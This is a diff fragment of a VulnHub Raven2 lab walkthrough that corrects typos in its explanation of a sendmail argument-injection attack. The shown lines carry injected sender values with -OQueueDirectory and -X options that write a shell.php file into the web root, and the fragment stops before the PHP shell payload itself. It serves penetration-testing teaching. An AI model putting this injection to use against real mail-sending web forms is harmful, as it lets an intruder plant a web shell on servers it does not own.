klezVirus/Posts/reviews/vulnhub/raven2/readme.md

 TRUE
 ```

-When called by PHP mail function, the sendmail program would look like it was called from the commnad like in the following way:
+When called by PHP mail function, the sendmail program would look like it was called from the command like in the following way:
 ```
 tester@Raven:# sendmail -f"injection\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server" @pwnd.com

 ```

-However, if anyone tryes to execute the command this way, he will see that it won't work.
+However, if anyone tries to execute the command this way, he will see that it won't work.
 To make it work properly, it's necessary to launch it this way:
 ```bash
 tester@Raven:# $(printf '/usr/sbin/sendmail -f"injection\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server" @pwnd.com')

 ```
 Killing the command with `Ctrl+C`, and listing the files within the directory,
 it's observable that the file shell.php has been created, registering the output of the command.
 At this point, the last thing to do is to choose where to put the PHP shell payload.
-We can control two additional part of the sendmail commnad, as seenable from the contact.php:
+We can control two additional part of the sendmail command, as observable from the contact.php:

 ```php
 $name=$_REQUEST['name'];